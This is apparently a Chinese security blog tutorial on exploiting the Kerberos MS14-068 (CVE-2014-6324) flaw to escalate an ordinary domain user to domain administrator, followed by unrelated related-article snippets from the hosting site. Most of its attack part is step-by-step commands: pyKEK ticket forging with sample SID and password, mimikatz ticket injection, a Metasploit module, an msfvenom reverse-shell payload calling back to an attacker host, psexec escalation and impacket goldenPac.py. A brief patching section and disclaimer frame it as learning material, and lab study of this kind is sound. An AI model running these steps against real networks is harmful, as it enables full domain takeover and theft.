内网安全之:Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324)

2023-11-16

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324

Microsoft Security Bulletin MS14-068 - Critical | Microsoft Docs

受该漏洞影响的操作系统,包括Win2003、Wind2008、Win2008 R2、Win2012和 Win2012 R2。该漏洞可导致活动目录整体权限控制受到影响,允许攻击者将域内任意用户权限提升至域管理级别。即,如果攻击者获取了域内任何一台计算机的Shell 权限,同时知道任意域用户的用户名、SID、密码,即可获得城管理员权限,进而控制域控制器,最终获得域权限。

漏洞产生原因:用户在向 Kerberos 密钥分发中心( KDC)申请 TGT (由票据授权服务产生的身份凭证)时,可以伪造自己的Kerberos 票据。如果票据声明自己有域管理员权限,而在处理该票据时未验证票据的签名, 那么返给用户的 TGT 就使普通域用户拥有域管理员权限。该用户可以将 TGT 发送到 KDC,KDC的 TGS (票据授权服务)在验证TGT后,将服务票据(Service Ticket)发送给该用户,而该用户拥有访问任何该服务的权限,从而使攻击者可以访问域内的资源。

1 pyKEK 工具包

mubix/pykek: Kerberos Exploitation Kit (github.com)

pyKEK (Python Kerberos Expoitation Kit)是利用Kerberos协议进行渗透测试的工具包,使用PyKEK可以生生成一张高权原的服务票据,并通过mimikatz将服务票据注人内存。PyKEK 运行在Python 2.7环境。使用PyKEK,可以将Python文件转换为可执行文件。

# ms14-068.py 脚本说明
-u <userName>@<domainName>:域用户名@域名。
-s <userSid>: 域用户SID。
-d <domainControlerAddr>:域控制器地址。
-p <clearPassword>: 明文密码。
--rc4 <ntlmHash>:在没有明文密码的情况下,通过NTLM Hash登录。

# 查看域控制器是否安装针对 MS14-068 ( CVE-2014-6324 )漏洞提供的补丁为 KB3011780
wmic qfe get hotfixid

# 查看域用户 SID
whoami /user
# 查看域内所有用户 SID
wmic useraccount get name,sid

# 生成高权限票据
python.exe ms14-068.py -u test02@test.lab -s S-1-5-21-3884001349-2725517725-626265054-1108 -d 10.1.1.21 -p Admin123

# 查看注入前是否有通过 IPC 可以访问域控制器的目录权限
dir \\dc\c$

# 清除内存中的所有票据,并将高权限票据注入内存
kerberos::purge
kerberos::ptc "TGT_test02@test.lab.ccache"

# 查看注入前是否有通过 IPC 可以访问域控制器的目录权限
dir \\dc\c$

image-20211208204030399

2 MSF 中 ms14_068 利用

# 利用 msf 生成高权限票据
auxiliary/admin/kerberos/ms14_068_kerberos_checksum

# 由于msf 不支持 bin 文件写入,要使用 Mimikatz 对文件进行格式转换
kerberos::clist "20211208211852_default_10.1.1.21_windows.kerberos_341121.bin" /export

# 生成一个反弹 shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.1.1.17 lport=4444 -a x64 -f exe > Desktop/evil17.exe

# kali 中监听反弹 shell 链接
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp

# 在反弹 shell 中导入票据
getuid
load kiwi 
kerberos_ticket_use /home/kali/Desktop/0-00000000-test02@krbtgt-TEST.LAB.kirbi
background 

# 利用高权限票据提权
use exploit/windows/local/current_user_psexec
set technique PSH
set rhosts 10.1.1.21
set session 1
run
getuid

image-20211208211940603

image-20211208213335512

3 goldenPac.py

goldenPac.py是一个用于对Kerberos进行测试的工具,它集成在impacket/examples下。

python goldenPac.py 域名/域成员用户:域成员用户密码@域控制器地址

# kali 下安装 Kerberos 客户端
apt-get install krb5-user -y

# goldenPac.py 是通过 PsExec 获取域控制器的Shell,会产生大量日志,另外 PsExec 文件容易被杀软查杀,可行性不高。

4 防范 Kerberos MS14-068 漏洞

  • 开启Windows Update功能,进行自动更新。
  • 手动下载补丁包进行修复。
  • 对域内账号进行控制,禁止使用弱口令,及时、定期修改密码。
  • 在服务器上安装反病毒软件,及时更新病毒库。
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

内网安全之:Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324) 的相关文章

  • Linux下的文件名空格处理

    转载原文 https blog csdn net michaelzhou224 article details 12708333 解决空格问题的几种方案 1 使用 来替代一个含有空格的文件以及目录 jorncess red black 可以
  • Android开发-Android项目结构

    文章目录 前言 一 Gradle 1 1什么是Gradle 1 2Gradle是一个构建工具 那么为什么要用构建工具 二 项目结构 三 app目录结构 四 res目录结构 总结 前言 Android工程的项目结构比较复杂 在进行Androi
  • AWD简单介绍和搭建AWD平台

    AWD简单介绍和搭建AWD平台 何为AWD 比赛中每个队伍维护多台服务器 服务器中存在多个漏洞 利用漏洞攻击其他队伍可以进行得分 修复漏洞可以避免被其他队伍攻击失分 1 一般分配Web服务器 服务器 多数为Linux 某处存在flag 一般
  • KNN数据分类算法的matlab仿真

    目录 1 算法概述 2 仿真效果 3 MATLAB仿真源码 1 算法概述 KNN的本质是通过距离判断待测样本和已知样本是否相似 待测样本找到与已知样本中与其距离最近的K个样本 对这k个样本 它们大多数属于哪一类别 就把待测样本归为哪一类别
  • [工程编写]cmakelist多版本python环境编写

    问题 最近在写一个工程的时候需要用到python3 但是由于引入了ROS相关的环境 导致希望使用python3的那部分代码一直默认使用ROS中的python2 这样环境就不对了 解决的方法 很顺理成章的想法是为需要python3的那部分代码
  • 注解&反射学习笔记

    1 注解的作用域及使用方式 表示我们的注解可以使用在那些地方 Target value ElementType METHOD ElementType TYPE 表示注解在什么地方有效 RESOUT 源码 lt CLASS 类 lt RUNT
  • IntelliJ Idea 常用快捷键 超实用!

    IntelliJ Idea 常用快捷键 列表 实战终极总结 1 自动代码 常用的有fori sout psvm Tab即可生成循环 System out main方法等boilerplate样板代码 例如要输入for User user u

随机推荐

  • Pytorch如何保存训练好的模型

    0 为什么要保存和加载模型 用数据对模型进行训练后得到了比较理想的模型 但在实际应用的时候不可能每次都先进行训练然后再使用 所以就得先将之前训练好的模型保存下来 然后在需要用到的时候加载一下直接使用 模型的本质是一堆用某种结构存储起来的参数
  • docker 迁移 /var/lib/docker(解决 /var/lib/docker 占用大 / 根目录空间占满问题)

    迁移docker工作目录 目的 为了解决 var lib docker 占用大 var 分区空间不够问题 说明 由于centos7 4系统 系统默认根目录下面为50G空间 docker默认数据目录在 var lib docker中 所以 会
  • 云孚快写:自动生成多级目录,一键生成万字长文

    1 产品简介 云孚快写是云孚科技自主研发的一款智能写作产品 基于大模型技术打造 针对长文写作场景深度优化 可根据文章标题一键生成目录 再根据目录一键生成正文 文章字数无上限 可极大提升用户的长文写作效率 云孚快写以哈工大与云孚科技联合研发的
  • Hive的常用HiveQL操作

    文章目录 Hive的常用HiveQL操作 1 HiveQL概述 2 HiveQL操作命令 2 1 数据定义 2 1 1 创建 修改和删除数据库 2 1 2 创建 修改和删除表 2 1 3 视图 索引创建 修改和删除 2 1 4 用户自定义函
  • 【如何处理信息收集时子域名爆破泛解析的问题】

    如何处理信息收集时子域名爆破泛解析的问题 子域名泛解析的成因 泛域名解析举例 子域名爆破中解决泛解析的方式 推荐工具 子域名泛解析的成因 在子域名解析中 每个子域名都会解析为一个特定的IP地址 只有被设置解析 用户才能正常进行访问 一旦用户
  • 一种解决ChatGPT报错“Sorry, you have been blocked“的方法

    ChatGPT突然不能用 尝试了网上说的重启V某N 打开隐私模式等方法都不管用 采用下面方式 解决 1 打开浏览器的 设置 2 找到语言设置 3 将首选语言改成英语 搞定
  • OpenStack主要功能和作用

    OpenStack主要组件和作用 openstack是一个开源的云计算管理平台 由几个重要的组件结合起来完成工作 openstack支持所有类型的云环境 实施简单可以大规模扩展丰富标准统一的云计算管理平台 openstack通过各种互补的服
  • C++之模板<template>

    目录 前言 模板 1 泛型编程 2 函数模板 2 1 函数模板的概念 2 2 函数模板的格式 2 3 函数模板的原理 2 4 函数模板的实例化 2 5 模板参数的匹配原则 3 类模板 3 1 类模板的概念 3 2 类模板的格式 3 3 类模
  • Android进程间通信(IPC)机制Binder介绍

    转载自 http blog csdn net luoshengyang article details 6618363 在Android系统中 每一个应用程序都是由一些Activity和Service组成的 这些Activity和Servi
  • 2012-03-25 17:31 以太网中的UDP编程:udp分包问题

    1 在进行UDP编程的时候 我们最容易想到的问题就是 一次发送多少bytes好 当然 这个没有唯一答案 相对于不同的系统 不同的要求 其得到的答案是不一样的 我这里仅对 像ICQ一类的发送聊天消息的情况作分析 对于其他情况 你或许也能得到一
  • ffmpeg常用编解码命令

    ffmpeg常用编解码命令 1 ffplay exe 1 播放MP4文件 指定标题以及播放分辨率 ffplay exe window title 视频监控 x 720 y 576 i 2019 09 19 14 21 20 Ch7 mp4
  • 数组17--机器人的运动范围

    数组17 机器人的运动范围 jz66 题目概述 解析 参考答案 注意事项 说明 题目概述 算法说明 地上有一个m行和n列的方格 一个机器人从坐标0 0的格子开始移动 每一次只能向左 右 上 下四个方向移动一格 但是不能进入行坐标和列坐标的数
  • Qt重绘之update,repaint详解

    Qt里面的重绘和Windows编程里面的重绘差不多 但是Qt的重绘更有特色 更加智能 在讲之前 先说说paintEvent paintEvent 是一个虚函数槽 slot 子类可以对父类的paintEvent进行重写 当调用update r
  • 【C51自学笔记】数码管(静态与动态显示)+74HC138+点阵的动态显示

    数码管 数码管由7个发光二极管组成一个日字形 如果需要显示小数点 那么就再加一个点 就是8段数码管 数码管显示亮度高 响应速度快 分共阴和共阳两种形式 常用的有单个的和 联的 还有两联的和专门用来显示时间的 分类 共阴 共阳 编码问题 必须
  • sqli-labs(34)

    0x01构造闭合 同样 发现 被注释掉了 试探了一波发现什么信息都不会返回 正确错误的页面都一样 之前我们的方法就是将过滤函数添加的 给吃掉 而get型的方式我们是以url形式提交的 因此数据会通过URLencode 如何将方法用在post
  • 本地以图搜图识图工具——嗅图狗!(python3.6实现图像比对指路,代码git)

    1 写在前面 因为之前做完后 当毕业设计做的 为了尽量实用打了个exe 结果好多人反应问题 索性直接把代码 更新exe的链接都写个博客放在这里 这么晚才放出源码就是怕毕设查重 全部项目源码git及说明 https github com na
  • 获取outputstream大小_apache POI - 获取生成的excel文件的大小

    I m using Apache POI for generating excel file in my spring mvc application here is my spring action RequestMapping valu
  • 【微信小程序】scroll-view滚动

    1 竖向滚动 wxml文件
  • 在解决程序问题中遇到的比较有用的模块

    retry 用来判断程序是否异常 pbar tqdm a b c d for char in pbar time sleep 3 pbar set description Processing s char 安装 pip install r
  • 内网安全之:Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324)

    郑重声明 本笔记编写目的只用于安全知识提升 并与更多人共享安全知识 切勿使用笔记中的技术进行违法活动 利用笔记中的技术造成的后果与作者本人无关 倡导维护网络安全人人有责 共同维护网络文明和谐 Kerberos 域用户提权漏洞 MS14 06